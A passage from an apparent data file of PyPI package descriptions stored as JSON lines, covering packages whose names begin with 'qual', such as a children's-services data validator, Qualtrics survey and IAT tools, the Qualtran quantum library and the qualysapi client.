toPyPI.Release naming should follow a pseudo-semantic versioningformat:... Alpha and beta releases can be flagged by appending-alpha.and-beta..For example, the August 2021 release is named2021.8with the associated tagv2021.8."} +{"package": "quality-lac-data-validator", "pacakge-description": "Quality LAC data beta: Python validatorWe want to build a tool that improves the quality of data on Looked After Children so that Children\u2019s Services Departments have all the information needed to enhance their services.We believe that a tool that highlights and helps fixing data errors would be valuable for:Reducing the time analysts, business support and social workers spend cleaning data.Enabling leadership to better use evidence in supporting Looked After Children.About this projectThe aim of this project is to deliver a tool to relieve some of the pain-points\nofreporting and qualityin children's services data. This project\nfocuses, in particular, on data on looked after children (LAC) and theSSDA903return.The project consists of a number of related pieces of work:Hosted ToolReact & Pyodie Front-EndPython Validator Engine & Rules[this repo]Local Authority Reference DataPostcode Reference DataThe core parts consist of aPythonvalidator engine and rules usingPandaswithPoetryfor dependency management. The tool is targeted\nto run either standalone, or inpyodidein the browser for a zero-install\ndeployment with offline capabilities.It provides methods of finding the validation errors defined by the DfE in 903 data.\nThe validator needs to be provided with a set of input files for the current year and,\noptionally, the previous year. These files are coerced into a common format and sent to\neach of the validator rules in turn. The validators report on rows not meeting the rules\nand a report is provided highlight errors for each row and which fields were included in\nthe checks.Data pipelineLoading of filesIdentification of tables - currently matched onexactfilenameConversion of CSV to tabular format -no type checkingEnrichment of provided data with Postcode distancesEvaluation of rulesReportProject StructureThese are the key filesproject\n\u251c\u2500\u2500\u2500 pyproject.toml - Project details and dependencies\n\u251c\u2500\u2500\u2500 validator903\n\u2502 \u251c\u2500\u2500\u2500 config.py - High-level configuration\n\u2502 \u251c\u2500\u2500\u2500 ingress.py - Data ingress (handling CSV and XML files)\n\u2502 \u251c\u2500\u2500\u2500 types.py - Classes used across the work\n\u2502 \u251c\u2500\u2500\u2500 validator.py - The core validator process\n\u2502 \u2514\u2500\u2500\u2500 validators.py - All individual validator codes\n\u2514\u2500\u2500\u2500 tests - Unit testsMost of the work from contributors will be invalidators.pyand the associated testing files under\ntests. Please do not submit a pull-request without a comprehensive test.DevelopmentTo install the code and dependencies, from the main project directory run:poetry installIf this does not work, it might be because you're running the wrong version of Python, the version of Numpy used by the 903 validator is locked at 3.9. The devcontainer and dockerfile should ensure you are running 3.9 and you may simply require a rebuild. If not, ensure you are working in an environment or venv with Python 3.9 as your interpreter.Adding validatorsValidators are simple functions, usually calledvalidate_XXX()which take no arguments and\nreturn a tuple of anErrorDefinitionand a test function. The test function itself takes\na single argument, thedatastore, which is aMapping(a dict-like) following the structure below.The following is the expected structure for the input data that is given to each validator (thedfsobject).\nYou should assume that not all of these keys are present and handle that appropriately.Any XML uploads are converted into CSV form to give the same inputs.{\n # This years data\n 'Header': # header dataframe\n 'Episodes': # episodes dataframe\n 'Reviews': # reviews dataframe\n 'UASC': # UASC dataframe\n 'OC2': # OC2 dataframe\n 'OC3': # OC3 dataframe\n 'AD1': # AD1 dataframe\n 'PlacedAdoption': # Placed for adoption dataframe\n 'PrevPerm': # Previous permanence dataframe\n 'Missing': # Missing dataframe\n # Last years data\n 'Header_last': # header dataframe\n 'Episodes_last': # episodes dataframe\n 'Reviews_last': # reviews dataframe\n 'UASC_last': # UASC dataframe\n 'OC2_last': # OC2 dataframe\n 'OC3_last': # OC3 dataframe\n 'AD1_last': # AD1 dataframe\n 'PlacedAdoption_last': # Placed for adoption dataframe\n 'PrevPerm_last': # Previous permanence dataframe\n 'Missing_last': # Missing dataframe\n # Metadata\n 'metadata': {\n 'collection_start': # A datetime with the collection start date (year/4/1)\n 'collection_end': # A datetime with the collection end date (year + 1/4/1)\n 'postcodes': # Postcodes dataframe, columns laua, oseast1m, osnrth1m, pcd\n 'localAuthority: # The local authority code entered (long form, e.g. E07000026)\n 'collectionYear': # The raw collection year string - unlikely to need this (e.g. '2019/20')\n }\n}ReleasesTo build and release a new version, make sure all your unit tests pass.We usesemantic versioning, so update the project version inpyproject.tomlaccordingly\nand commit, creating a PR. Once the release version is on GitHub, create a GitHub release naming the release with the\ncurrent release name, e.g. 1.0 and the tag with the release name prefixed with a v, i.e. v1.0. Alpha and beta releases\ncan be flagged by appending-alpha.and-beta.."} +{"package": "qualitylib", "pacakge-description": "qualitylibmethods and metrics for the assessment of quality in medical imaging (initial focus on MRI and neuroimaging)Featuresimage quality metricspredictive modelsquality assessment methodsanything else relevantHistory0.0.1 (2021-08-25)First release on PyPI."} +{"package": "quality-master", "pacakge-description": "Quality-MasterQuality-Master is a tool that allows you to check if your commit will degrade the code quality in the master branch."} +{"package": "quality-result-gui", "pacakge-description": "quality-result-guiQGIS plugin for visualizing quality check results.PluginNot implemented yet.LibraryTo use this library as an external dependency in your plugin or other Python code, install it usingpip install quality-result-guiand use imports from the providedquality_result_guipackage. If used in a plugin, library must be installed in the runtime QGIS environment or useqgis-plugin-dev-toolsto bundle your plugin with runtime dependencies included.Minimal working example (with JSON file)For quality dock widget to work, a subclass of QualityResultClient needs to be first implemented. Instance of the created API client class is then passed to QualityErrorsDockWidget. For a real-world application, a separate backend application is needed for checking data quality and provide the quality check results for the QGIS plugin.Example of the expected api response can be seen inthis file.Example parser classfor json response is also provided for the following example to work:importjsonfromqgis.utilsimportifacefromquality_result_gui.api.quality_api_clientimportQualityResultClientfromquality_result_gui.api.types.quality_errorimportQualityErrorfromquality_result_gui_plugin.dev_tools.response_parserimportQualityErrorResponsefromquality_result_gui.quality_error_managerimportQualityResultManagerclassExampleQualityResultClient(QualityResultClient):defget_results(self)->Optional[List[QualityError]]:\"\"\"Retrieve latest quality errors from APIReturns:None: if no results availableList[QualityError]: if results availableRaises:QualityResultClientError: if request failsQualityResultServerError: if check failed in backend\"\"\"full_path_to_json=\"some-path/example_quality_errors.json\"example_response=json.loads(Path(full_path_to_json).read_text())returnQualityErrorResponse(example_response).quality_resultsdefget_crs(self)->QgsCoordinateReferenceSystem:returnQgsCoordinateReferenceSystem(\"EPSG:3067\")api_client=ExampleQualityResultClient()quality_manager=QualityResultManager(api_client,iface.mainWindow())quality_manager.show_dock_widget()Development of quality-result-guiSeedevelopment readme.License & copyrightLicensed under GNU GPL v3.0.This tool is part of the topographic data production system developed in National Land Survey of Finland. For further information, see:Abstract for FOSS4GGeneral news article about the projectCopyright (C) 2022National Land Survey of Finland.CHANGELOG2.0.7- 2024-01-17Fix: Process modifications in quality error tree correctly when multiple filters are present2.0.6- 2024-01-05Fix: Show correct results when user processed filter is toggled with map extent filter active2.0.5- 2023-12-12Fix: Filter newly inserted quality error rows correctly with user processed and map extent filters2.0.4- 2023-10-05Fix: Redraw map when an error is selected and errors are not visualized on map2.0.3- 2023-09-12Fix: Include .qm translation files to the zip generated by release workflow action2.0.2- 2023-09-06Fix: Make Finnish translations visible2.0.1- 2023-07-12Feat: Add Finnish translations2.0.0- 2023-07-11Refactor!: replace hierarchical representation of quality errors with a flat quality error list1.1.6- 2023-05-23Feat: Add functionality to display quality error feature type and attribute names from layer aliases.1.1.5- 2023-03-29Fix: Do not zoom to error when geometry is null geometry1.1.4- 2023-03-08Fix: Show correct error count when errors are filteredFix: Remove selected error visualization from map when error is removed from list1.1.3- 2023-03-03Feat: Add method to hide dock widget and functionality to recreate error visualizations1.1.2- 2023-03-01Fix: Do not hide filter menu when a filter is selectedFix: Fix missing marker symbol from line type annotationsFeat: Allow configuring quality layer stylesFeat: Add keyboard shortcut for visualize errors on map1.1.1- 2023-02-23Feat: Change Show user processed filter into checkbox selection1.1.0- 2023-02-16Feat: Add optional extra info field to quality error. Extra info is displayed in the tooltip of error description and may contain html formatted text.Refactor: Remove language specific description fields from quality error and include only a single field for description.1.0.0- 2023-02-14Feat: Added an API to add custom filters for errors.Fix: Hide empty branches from quality error list when user processed errors are hidden and user processes all errors for a featureFix: Error layer stays visible after minimizing QGIS.0.0.4- 2022-12-28Feat: Emit mouse event signal for selected error featureFeat: New filter to filter quality errors by error attribute valueFeat: Add tooltip for quality error descriptionFeat: Update data in tree view partially when data changesFix: Minor styling fixes of tree viewFix: Visualize error when description is clicked0.0.3- 2022-12-15Fix: Use glob paths for missing build resource files0.0.2- 2022-12-14Fix: Fix missing ui and svg files by including them in setuptools build0.0.1- 2022-12-14Initial release: QGIS dock widget for visualizing quality check results"} +{"package": "quality-scaler", "pacakge-description": "No description available on PyPI."} +{"package": "quality-toolkit", "pacakge-description": "Quality-ToolkitToolkit for the quality in order to help writing testsContributionClone the projectgitclonehttps://github.com/veepee-oss/quality-toolkitquality-toolkitcdquality-toolkitInstallation in localmakeinstallInstallation in a projectEdit the project's requirements.txt and add the line :quality-toolkitand finish by install the project dependencies :pip3installHow to use the libSee the list of available componants :HelpersServices"} +{"package": "quality-viewer", "pacakge-description": "quality-viewerA simple CLI for renderingQuality Views. Built onGraphviz.Installationpip install quality-viewerUsageTo use, you need to create a series of JSON documents in a folder. These files define the components in your quality view and the individual scores for each attribute. Scores are out of 10,quality-vieweruses the mean to generate the colours in the PDF.This is an example of the component definition:{\n \"component\": \"my-lovely-component\",\n \"depends_on\": [\"my-other-component\"],\n \"attributes\": [\n {\n \"name\": \"code\",\n \"score\": 5,\n \"notes\": \"I wrote this in Uni\"\n },\n {\n \"name\": \"tests\",\n \"score\": 2,\n \"notes\": \"I wrote this in Uni\"\n }\n ]\n}Then you can run the CLI against your folder of component definitions which will generate a PDF in that folder namedquality_view.gv.pdf:quality-viewer ./my_componentsIf you run these regularly, you probably want to label each PDF. Customise the label on the graph with the--labelargument:quality-viewer --label \"Quality Views - Christmas 2019\" ./my_componentsA fairly elaborate example, which uses dated quality views can be found at (other repo)[more work]. This is a good repo to get started from.DevelopmentThis repository is setup to validate your work easily, running tests is as simple as:make testAnd checking your coding style is:make checkTo automagically conform to the above, run:make format"} +{"package": "qualkit", "pacakge-description": "DACT Qualitative Analysis Toolkit (qualkit)This project is a collection of utilities for conducting qualitative\nanalysis.It currently consists of the following modules:clean: a utility for cleaning up text prior to use with other toolssentiment: a wrapper around SciKit's SentimentIntensityAnalyzeranchored_topic_model: creates topic models using the Corex algorithm (Gallagher et. al., 2017) with user-supplied anchors to 'steer' the model using domain knowledgestopwords: a standard set of stopwordstopics: a wrapper around SciKit's LatentDirichletAllocationkeywords: a wrapper around NLTK's RAKE (Rapid Keyword Extraction) algorithm for finding\nkeywords in text.For more details on each module, see the 'docs' folder.Installing the toolkit and its requirementsInstall using:pip install qualkitOr add 'qualkit' to your requirements.txt file, or add as\na dependency in project properties in PyCharm.User ControlA user has control over the following aspects when using this toolkit which will influence outputs.Anchoring strategiesAnchor StrengthNumber of topicsLabelling True/False for each topic instead of dichotomisingHow data is preprocessed before topic modelling, redaction, tfidr vectoriser etecReferencesGallagher, R. J., Reing, K., Kale, D., and Ver Steeg, G. \"Anchored Correlation Explanation: Topic Modeling with Minimal Domain Knowledge.\" Transactions of the Association for Computational Linguistics (TACL), 2017."} +{"package": "qualle", "pacakge-description": "QualleThis is an implementation of the Qualle framework as proposed in the paper\n[1] and accompanying source code.The framework allows to train a model which can be used to predict\nthe quality of the result of applying a multi-label classification (MLC)\nmethod on a document. In this implementation, only therecallis predicted for a document, but in principle\nany document-level quality estimation (such as the prediction of precision)\ncan be implemented analogously.Qualle provides a command-line interface to train\nand evaluate models. In addition, a REST webservice for predicting\nthe recall of a MLC result is provided.RequirementsPython>= 3.8is required.InstallationChoose one of these installation methods:With pipQualle is available onPyPI. You can install Qualle using pip:pip install qualleThis will install a command line tool calledqualle. You can callqualle -hto see the help message which will\ndisplay the available modes and options.Note that it is generally recommended to use avirtual environmentto avoid\nconflicting behaviour with the system package manager.From sourceYou also have the option to checkout the repository and install the packages from source. You needpoetryto perform the task:# call inside the project directorypoetryinstall--withoutciDockerYou can also use a Docker Image from theContainer Registry of Github:docker pull ghcr.io/zbw/qualleAlternatively, you can use the Dockerfile included in this project to build a Docker image yourself. E.g.:docker build -t qualle .By default, a container built from this image launches a REST interface listening on0.0.0.0:8000You need to pass the model file (see below the section REST interface) per bind mount or volume to the docker container.\nBeyond that, you need to specify the location of the model file with an\nenvironment variable namedMODEL_FILE:docker run --rm -it --env MODEL_FILE=/model -v /path/to/model:/model -p 8000:8000 ghcr.io/zbw/qualleGunicornis used as HTTP Server. You can use the environment variableGUNICORN_CMD_ARGSto customize\nGunicorn settings, such as the number of worker processes to use:docker run --rm -it --env MODEL_FILE=/model --env GUNICORN_CMD_ARGS=\"--workers 4\" -v /path/to/model:/model -p 8000:8000 ghcr.io/zbw/qualleYou can also use the Docker image to train or evaluate by using the Qualle command line tool:dockerrun--rm-it-v\\/path/to/train_data_file:/train_data_file/path/to/model:/modelghcr.io/zbw/qualle\\qualletrain/train_data_file/modelThe Qualle command line tool is not available for the release 0.1.0 and 0.1.1. For these releases,\nyou need to call the python modulequalle.maininstead:dockerrun--rm-it-v\\/path/to/train_data_file:/train_data_file/path/to/model:/modelghcr.io/zbw/qualle:0.1.1\\python-mqualle.maintrain/train_data_file/modelUsageInput dataIn order to train a model, evaluate a model or predict the quality of an MLC result\nyou have to provide data.This can be a tabular-separated file (tsv) in the format (tabular is marked with\\t)document-content\\tpredicted_labels_with_scores\\ttrue_labelswheredocument-contentis a string describing the content of the document\n(more precisely: the string on which the MLC method is trained), e.g. the titlepredicted_labels_with_scoresis a comma-separated list of pairspredicted_label:confidence-score(this is basically the output of the MLC method)true_labelsis a comma-separated list of true labels (ground truth)Note that you can omit thetrue_labelssection if you only want to predict the\nquality of the MLC result.For example, a row in the data file could look like this:Optimal investment policy of the regulated firm\\tConcept0:0.5,Concept1:1\\tConcept0,Concept3For those who use an MLC method via the toolkitAnniffor automated subject indexing:\nYou can alternatively specify afull-text document corpuscombined with the result of the Annif index method (tested with Annif version 0.59) applied on the corpus.\nThis is a folder with three files per document:doc.annif: result of Annif index methoddoc.tsv: ground truthdoc.txt: document contentAs above, you may omit thedoc.tsvif you just want to\npredict the quality of the MLC result.TrainTo train a model, use thetrainmode, e.g.:qualle train /path/to/train_data_file /path/to/output/modelIt is also possible to use label calibration (comparison of predicted vs actual labels) using the subthesauri of a thesaurus (such as theSTW)\nas categories (please read the paper for more explanations). Consult the help (see above) for the required options.EvaluateYou must provide test data and the path to a trained model in order to evaluate that model. Metrics\nsuch as theexplained variationare printed out, describing the quality\nof the recall prediction (please consult the paper for more information).REST interfaceTo perform the prediction on a MLC result, a REST interface can be started.uvicornis used as HTTP server. You can also use any\nASGI server implementation and create the ASGI app directly with the methodqualle.interface.rest.create_app. You need to provide the environment variable\nMODEL_FILE with the path to the model (seequalle.interface.config.RESTSettings).The REST endpoint expects a HTTP POST with the result of a MLC for a list of documents\nas body. The format is JSON as specified inqualle/openapi.json. You can also use\nthe Swagger UI accessible athttp://address_of_server/docsto play around a bit.ContributeContributions via pull requests are welcome. Please create an issue beforehand\nto explain and discuss the reasons for the respective contribution.qualle code should follow theBlack style.\nThe Black tool is included as a development dependency; you can runblack .in the project root to autoformat code.References[1]Toepfer, Martin, and Christin Seifert. \"Content-based quality estimation for automatic subject indexing of short texts under precision and recall constraints.\" International Conference on Theory and Practice of Digital Libraries. Springer, Cham, 2018., DOI 10.1007/978-3-030-00066-0_1Context informationThis code was created as part of the subject indexing automatization effort atZBW - Leibniz Information Centre for Economics. Seeour homepagefor more information, publications, and contact details."} +{"package": "qualm", "pacakge-description": "QualmQualm is an esolang, which uses a cell-based memory model.InstallationYou can install Qualm from PyPi:python3 -m pip install --user qualmOr clone the repository:$ git clone https://github.com/wilfreddv/qualm.git\n$ cd qualm\n$ python3 -m pip install --user .DocumentationData operations:\n| split string on delimiter\n@ index of, e.g.: \"'apples pears bananas:@'apples\n$ indexing\ni turn into integer\nc turn into character (chr())\no turn into ascii value (ord())\n\n. read from STDIN\n! write to STDOUT\nw working cell\ns swap var with w\n> push w to \n< pop to w\n> write output of previous operation to \n can also be `w`, like sw\nv put data in w\n'...: string data\n{{...} loop\n+ add\n- sub\n* mul\n/ div\n% mod\n= equals\n!= neq\n<= smaller\n>= biggerExamplesHello worldHello world:\nv'Hello World!:!\n\nv write into working cell\n' denotes string data\n! printsFibonacci sequencev2>0v1>1{s1<=23416728348467685{!iv' :!<1+<0s0}"} +{"package": "qualname", "pacakge-description": "Python module to emulate the__qualname__attribute for classes and methods\n(Python 3.3+) in older Python versions. SeePEP 3155for details.Installationpip install qualnameUsageAssume these definitions:class C:\n def f():\n pass\n\n class D:\n def g():\n passIn Python 3.3+, classes have a__qualname__property:>>> C.__qualname__\n'C'\n>>> C.f.__qualname__\n'C.f'\n>>> C.D.__qualname__\n'C.D'\n>>> C.D.g.__qualname__\n'C.D.g'Unfortunately, Python 2 and early Python 3 versions do not have an (obvious)\nequivalent.qualnameto the rescue:from qualname import qualname\n\n>>> qualname(C)\n'C'\n>>> qualname(C.f)\n'C.f'\n>>> qualname(C.D)\n'C.D'\n>>> qualname(C.D.g)\n'C.D.g'Victory!How does it work?Glad you ask.This module uses source code inspection to figure out how (nested) classes and\nfunctions are defined in order to determine the qualified names for them. That\nmeans parsing the source file, and traversing the AST (abstract syntax tree).\nThis sounds very hacky, and it is, but the Python interpreter itself does not\nhave the necessary information, so this justifies extreme measures.Now that you know how it works, you\u2019ll also understand that this module only\nworks when the source file is available. Fortunately this is the case in most\ncircumstances.LicenseBSD.Feedback? Issues?https://github.com/wbolster/qualname"} +{"package": "qualpay", "pacakge-description": "UNKNOWN"} +{"package": "qualpy", "pacakge-description": "UNKNOWN"} +{"package": "qualtop-conversational-analysis", "pacakge-description": "Conversational analysis based on communication with the OpenAI API (regardless of the API Base)Implementation of several methods for communication with the OpenAI API, embedding-based retrieval and data preparationGetting StartedCan be installed directly with pip (asetup.pyfile is provided, if needed).Notably the module contains theChatGPTMemoryclass, which enables communication with the OpenAI API (through the ChatCompletion endpoint) while managing conversation memory.Data preparation modulesThis project was not originally intended for production. A lot of the scripts contained here are mainly for data preparation (to demonstrate different use cases). However, some functions are being used by both thequaltop-llmapiand the QOPA-LLMdemosides of the project.In the future, this module should be replaced by a communication module. Also, any existent calculation functions should be passed to the server."} +{"package": "qualtop-llmapi", "pacakge-description": "Implementation of the OpenAI API for local LLM useImplementation of the OpenAI API. Currently supports two end points (ChatCompletion and Embeddings) with the following models:ChatCompletion models:'mistral-7b': 7B Instruct model trained by MistralAI.'llama-13b': 13B Llama 2 model trained by Meta.'llama-7b': 7B Instruct Llama 2 model trained by Together AI (32K context).'codellama-13b': 13B CodeLlama model trained by Meta.Embeddings models:'mistral-7b' : Encodes documents into 4096-dimension vectors.'bert' : Encodes documents into 386-dimension vectors.Getting StartedCan be installed directly with pip (asetup.pyfile is provided, if needed).Once installed, the FastAPI server (Uvicorn) can be started with:run_serverPromptsCurrently, two kinds of prompts are supported.Open ended questions to engage in conversation with the model.Instruct prompts for vector-based retrieval over some test collections.Some considerationsThis project is by no means production ready. The ChatCompletion endpoint in particular has been tailored to communicate with the QOPA-LLMdemo. A lot of work is needed security-wise to avoid data leaking."} +{"package": "qualtran", "pacakge-description": "# Q\u1d1c\u1d00\u029f\u1d1b\u0280\u1d00\u0274Q\u1d1c\u1d00\u029f\u1d1b\u0280\u1d00\u0274 (quantum algorithms translator) is a set of abstractions for representing quantum\nprograms and a library of quantum algorithms expressed in that language to support quantum\nalgorithms research.Note:Qualtran is an experimental preview release. We provide no backwards compatibility\nguarantees. Some algorithms or library functionality may be incomplete or contain inaccuracies.\nOpen issues or contact the authors with bug reports or feedback.Subscribe to [qualtran-announce@googlegroups.com](https://groups.google.com/g/qualtran-announce)\nto receive the latest news and updates!## DocumentationDocumentation is available athttps://qualtran.readthedocs.io/## InstallationQualtran is being actively developed. We recommend installing from source:git clonehttps://github.com/quantumlib/Qualtran.gitcd Qualtran/\npip install -e .You can also install the latest tagged release usingpip:pip install qualtran"} +{"package": "qualtrics-api", "pacakge-description": "qualtrics_apiA Python-based project that performs a query to a Qualtrics API.InstallationIn order to install this package, you can use the following command:pipinstallqualtrics-apiUsageOn terminal you can use it in the following way:qualtrics-api-t-d-sThis will return the survey with all the responses on JSON format.Powered by: Hugo Angulo"} +{"package": "qualtrics-iat", "pacakge-description": "Qualtrics IAT ToolA web app for generating the Implicit Association Test (IAT) running on QualtricsOnline Web AppThe app is hosted byStreamlit, a Python-based web framework. You can use the app here:Qualtrics IAT Tool.Run Web App OfflineAlternatively, you can run the app offline. The general steps are:Download the latest version of the repository.Install Python and Streamlit.Run the web app in a Terminal with the command:streamlit run your_directory/qualtrics_iat/web_app.pyCitation:Cui Y., Robinson, J.D., Kim, S.K., Kypriotakis G., Green C.E., Shete S.S., & Cinciripini P.M., An open source web\napp for creating and scoring Qualtrics-based implicit association test. arXiv:2111.02267 [q-bio.QM]Key FunctionalitiesThe web app has three key functionalities: IAT Generator, Qualtrics Tools, and IAT Data Scorer. Each functionality\nis clearly described on the web app regarding what parameters are expected and what they mean. If you have any\nquestions, please feel free to leave a comment or send your inquiries to me.IAT GeneratorIn this section, you can generate the Qualtrics survey template to run the IAT experiment. Typically, you\nneed to consider specifying the following parameters. We'll use the classic flower-insect IAT as an example. As\na side note, there are a few other IAT tasks (e.g., gender-career) in the app for your reference.Positive Target Concept: FlowerNegative Target Concept: InsectPositive Target Stimuli: Orchid, Tulip, Rose, Daffodil, Daisy, Lilac, LilyNegative Target Stimuli: Wasp, Flea, Roach, Centipede, Moth, Bedbug, GnatPositive Attribute Concept: PleasantNegative Attribute Concept: UnpleasantPositive Attribute Stimuli: Joy, Happy, Laughter, Love, Friend, Pleasure, Peace, WonderfulNegative Attribute Stimuli: Evil, Agony, Awful, Nasty, Terrible, Horrible, Failure, WarOnce you specify these parameters, you can generate a Qualtrics template file, from which you can create a Qualtrics\nsurvey that is ready to be administered. Please note that not all Qualtrics account types support creating surveys\nfrom a template. Alternatively, you can obtain the JavaScript code of running the IAT experiment and add the code\nto a Qualtrics question. If you do this, please make sure that you set the proper embedded data fields.Qualtrics ToolsIn this section, you can directly interact with the Qualtrics server by invoking its APIs. To use these APIs, you\nneed to obtain the token in your account settings. Key functionalities include:Upload Images to Qualtrics Graphic Library:\nYou can upload images from your local computer to your Qualtrics Graphics Library. You need to specify the library\nID # and the name of the folder to which the images will be uploaded. If the upload succeeds, the web app will return\nthe URLs for these images. You can set these URLs as stimuli in the IAT if your experiment uses pictures.Create Surveys:\nYou can create surveys by uploading a QSF file or the JSON text. Please note that the QSF file uses JSON as its\ncontent. If you're not sure about the JSON content, you can inspect a template file.Export Survey Responses:\nYou can export a survey's responses for offline processing. You need to specify the library ID # and the export file\nformat (e.g., csv).Delete Images:\nYou can delete images from your Qualtrics Graphics Library. You need to specify the library ID # and the IDs for\nthe images that you want to delete.Delete Survey:\nYou can delete surveys from your Qualtrics Library. You need to specify the survey ID #.IAT Data ScorerIn this section, you can score the IAT data from the exported survey response. Currently, there are two calculation\nalgorithms supported: the conventional and the improved.Citation for the algorithms: Greenwald et al. Understanding and Using the Implicit Association Test: I. An\nImproved Scoring Algorithm. Journal of Personality and Social Psychology 2003 (85)2:192-216The Conventional AlgorithmUse data from B4 & B7 (counter-balanced order will be taken care of in the calculation).Nonsystematic elimination of subjects for excessively slow responding and/or high error rates.Drop the first two trials of each block.Recode latencies outside 300/3,000 boundaries to the nearer boundary value.5.Log-transform the resulting values.Average the resulting values for each of the two blocks.Compute the difference: B7 - B4.The Improved AlgorithmUse data from B3, B4, B6, & B7 (counter-balanced order will be taken care of in the calculation).Eliminate trials with latencies > 10,000 ms; Eliminate subjects for whom more than 10% of trials have latency\nless than 300 ms.Use all trials; Delete trials with latencies below 400 ms (alternative).Compute mean of correct latencies for each block. Compute SD of correct latencies for each block (alternative).Compute one pooled SD for all trials in B3 & B6, another for B4 & B7; Compute one pooled SD for correct trials\nin B3 & B6, another for B4 & B7 (alternative).Replace each error latency with block mean (computed in Step 5) + 600 ms; Replace each error latency with\nblock mean + 2 x block SD of correct responses (alternative 1); Use latencies to correct responses when correction to\nerror responses is required (alternative 2).Average the resulting values for each of the four blocks.Compute two differences: B6 - B3 and B7 - B4.Divide each difference by its associated pooled-trials SD.Average the two quotients.Questions?If you have any questions or would like to contribute to this project, please send me an email:ycui1@mdanderson.org.LicenseMIT License"} +{"package": "qualtrics-mailer", "pacakge-description": "No description available on PyPI."} +{"package": "qualtrics-utils", "pacakge-description": "qualtrics-utilsUtilities for qualtrics surveys. Get and sync survey responses, generate codebooks, & c.Quickstart \ud83d\ude80This project requires Python^3.10to run.viapoetryInstall poetry, then runpoetry installAnd you're done.surveysExportingExample (get a survey's responses, convert to a pandas DataFrame):fromqualtrics_utilsimportSurveyssurveys=Surveys(api_token=QUALTRICS_API_TOKEN)exported_file=surveys.get_responses_df(survey_id=SURVEY_ID)df=exported_file.dataSurvey's can be exported to a variety of formats, including:.csv.xlsx.jsonAnd with a variety of parameters. Please see theExportCreationRequestdocumentationhereinsyncPerhaps one of the more useful features hereof is the ability to sync survey responses to the following services:Google SheetsMySQLFuture services will include:PostgreSQLMongoDBAWS S3Syncing can either be leveraged as a standard python module, or as a CLI tool.CLIExecute thehelpcommand to see the available options:python-mqualtrics_utils.sync--helpSee also theconfig.example.tomlfor an example configuration file.ModuleSimply importsync_*from thequaltrics_utils.syncmodule, and execute the function with the appropriate arguments.Syncing informationThe process is fairly straightforward:Ensure that the service has two \"tables\", or datastores for:Survey responses: This defaults to the input base name (defaults to the survey ID) +_responsesSurvey export statuses: This defaults to the input base name (defaults to the survey ID) +_statusExport the survey responses to the serviceUpdate the survey export statuses to reflect the exportThis will allow for a sync to pick up where it left off, only exporting newly found responses. Please note, if a first time sync contains enough survey responses to exceed the service's limits (~1.8 GB), the sync will fail. Please see theQualtrics documentationfor more information.For example, in google sheets:fromqualtrics_utilsimportSurveys,sync_sheetsimportpandasaspd# Survey ID or URLsurvey_id=...# Sheet URLresponses_url=...# dict of extra survey arguments for the export creation requestsurvey_args=...sheets=Sheets()defpost_processing_func(df:pd.DataFrame)->pd.DataFrame:# Do some post processing of the responses before syncing herereturndfsync_sheets(survey_id=survey_id,surveys=surveys,response_post_processing_func=post_processing_func,sheet_name=table_name,sheet_url=responses_url,sheets=sheets,**survey_args,)Codebook mappinggenerate.pyTakes the exported.qsffile from Qualtrics and generates a codebook mapping question\nIDs to question text and answer choices. The output is a JSON file containing a list of\ndictionaries.Example row:{\"question_number\":\"Q5.10\",\"question_string\":\"What is your role at this school?\",\"answer_choices\":\"...\"},map_columns.pyTakes a codebook mapping (generated by the above function) and creates conditional\nstatements to map the question columns into valid Tableau or SQL code. Used to create a\nsingular question column in the above formats when there are multiple questions in a\nsingle question block (e.g. multiple Likert scale questions).OpenAPI clientTo handle the majority of the qualtrics API calls, we use the publicly available OpenAPI spec, found on the qualtrics API docswebsiteThe OpenAPI spec is fed toopenapi-python-client, where it's used to generate a python client(s) for the qualtrics API. These clients (for each of the utilized APIs) come bundled and pre-generated as-is, but to create them anew, one can execute thecreate_api_client.pyscript. This will re-generate the clients and place them in thequaltrics_utilsdirectory. Occasionally, the OpenAPI spec is broken and mis-validated from Qualtrics; regenerate at your own risk."} +{"package": "qualtrutils", "pacakge-description": "QualtrUtils - A package to create questions from templates with Qualtrics (v3) APIThis package allows the creation of questions based on an existing template (i.e., a question created with the Qualtrics interface. The operations that this package supports are:Creating blockCopying an existing questionReplacing keywordsChanging multiple choice answersChanging the initial position of the sliderChanging a question JS codeInstallationUsing PIP:pipinstallqualtrutilsUsing CONDA:condainstall-cemanuele-albiniqualtrutilsFor developersTo use the package in editable mode use instead the following.gitclonehttps://github.com/emanuele-albini/qualtrutils.git\npipinstall--editablequaltrutilsConfiguration (optional)Global configuration is in~\\.qualtrutils\\qualtrics.toml. Example:API_URL=\"https://yourdatacenter.qualtrics.com/API/v3/\"API_TOKEN=\"your_token\"LIBRARY_ID=\"UR_XXXXXXXXXXXXX\"SURVEY_ID=\"SV_XXXXXXXXXXXXX\"The configuration saved in~\\.qualtrutils\\qualtrics.tomlwill be used as default inQualtricsSurveyconstructor.This configuration it's optional, the settigs can be directly passed toQualtricsSurveyat runtime.Usage examplefromqualtrutilsimportQualtricsSurveysurvey=QualtricsSurvey()# Get a question from an existing surveyquestion=survey.get_question_by_name('QuestionName','MyNewQuestion')# The following will replace (using regex) all the occurences# of 'SOMETHING' in the question text and multiples choice answers (if any)# with 'SOMETHING_ELSE'question.text_sub('SOMETHING','SOMETHING_ELSE')# The following will set the multiple choice answersquestion.set_choices(['First Answer','Second Answer','Third Answer'])# The flowwing will set the Javascript code of the questionquestion.set_js('var hello = 1;')# Add this new question to the survey in a block called 'Block A'# If the block does not exists it will be createdsurvey.create_question(question,'Block A')DocumentationSeeherefor the complete documentation with all the functionalities."} +{"package": "qualysapi", "pacakge-description": "qualysapiPython package, qualysapi, that makes calling any Qualys API very simple. Qualys API versions v1, v2, & WAS & AM (asset management) are all supported.My focus was making the API super easy to use. The only parameters the user needs to provide is the call, and data (optional). It automates the following:Automatically identifies API version through the call requested.Automatically identifies url from the above step.Automatically identifies http method as POST or GET for the request per Qualys documentation.UsageCheck out the example scripts in the/examples directory.ConnectThere are currenty three methods of connecting to Qualys APIsqualysapi.connect()will prompt the user for credentials at runtime.qualysapi.connect('/path/to/config.ini')will parse the config file for credentials (see below).qualysapi.connect(username='username', password='password')will use the provided credentials.ExampleDetailed example found atqualysapi-example.py.Sample example below.>>>importqualysapi>>>a=qualysapi.connect()QualysGuardUsername:my_usernameQualysGuardPassword:>>>printa.request('about.php')7.10.61-17.1.10-12.2.475-2InstallationUse pip to install:pipinstallqualysapiNOTE: If you would like to experiment without installing globally, look into 'virtualenv'.Requirementsrequests (http://docs.python-requests.org)lxml (http://lxml.de/)ConfigurationBy default, the package will ask at the command prompt for username and password. By default, the package connects to the Qualys documented host (qualysapi.qualys.com).You can override these settings and prevent yourself from typing credentials by doing any of the following:By 